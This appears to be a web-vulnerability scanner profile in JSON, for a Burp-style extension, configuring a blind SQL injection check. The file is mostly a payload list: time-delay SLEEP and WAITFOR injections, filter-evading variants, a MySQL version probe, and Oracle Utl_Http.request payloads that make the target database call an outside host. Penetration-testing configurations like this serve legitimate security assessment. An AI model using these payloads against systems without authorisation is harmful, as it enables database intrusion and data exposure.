[
 {
  "Name": "ACTIVE - SQL Injection (Blind)", 
  "Active": false, 
  "Scanner": 1, 
  "Payloads": [
   "' OR SLEEP(5)--", 
   "1' OR SLEEP(5)--", 
   "x' OR SLEEP(5)--", 
   "1\" OR SLEEP(5)--", 
   "x' waitfor delay '0:0:10'--", 
   "1 waitfor delay '0:0:10'--", 
   "1||Utl_Http.request('https://crowdshield.com/.injectx/r.php?sqli') from dual--", 
   "1'||Utl_Http.request('https://crowdshield.com/.injectx/r.php?sqli') from dual--", 
   "1') AND SLEEP(5) AND ('x'='x", 
   "1\") AND SLEEP(5) AND (\"x\"=\"x", 
   "1 AND SLEEP(5)", 
   "x AND SLEEP(5)", 
   "1 AND waitfor delay '0:0:10'", 
   "X AND waitfor delay '0:0:10'", 
   "(select*from(select(sleep(20)))a)", 
   "1-sleep/*f*/(10)", 
   "1-if(mid(version/*f*/(),1,1)=5,sleep/*f*/(5),0)", 
   "1-if(mid(version/*f*/(),1,1)=4,sleep/*f*/(5),0)", 
   "1'+AND+SLEEP(5)+AND+'aaxA'='aaxA", 
   "test' RLIKE (SELECT (CASE WHEN (9203=9203) THEN 0x74657374 ELSE 0x28 END))-- YOJb"
  ], 
  "Encoder": [
   "URL-encode key characters"
  ], 
  "UrlEncode": false, 
  "CharsToUrlEncode": "", 
  "Grep": [
   "INJECTX321"
  ], 
  "PayloadResponse": false, 
  "NotResponse": false, 
  "NotCookie": false, 
  "TimeOut": 0, 
  "isTime": false, 
  "CaseSensitive": false, 
  "isReplace": false, 
  "ExcludeHTTP": false, 
  "OnlyHTTP": false, 
  "IsContentType": false, 
  "ContentType": "", 
  "NegativeCT": false, 
  "IsResponseCode": false, 
  "ResponseCode": "", 
  "NegativeRC": false, 
  "MatchType": 1, 
  "RedirType": 4, 
  "MaxRedir": 5, 
  "rCookies": false, 
  "spaceEncode": true, 
  "payloadPosition": 1, 
  "sEncode": "+", 
  "payloadsFile": "", 
  "grepsFile": "", 
  "IssueName": "SQL Injection (Blind Based)", 
  "IssueSeverity": "High", 
  "IssueConfidence": "Tentative", 
  "IssueDetail": "SQL Injection (Blind Based)", 
  "RemediationDetail": "SQL Injection (Blind Based)", 
  "IssueBackground": "SQL Injection (Blind Based)", 
  "RemediationBackground": "SQL Injection (Blind Based)"
 }
]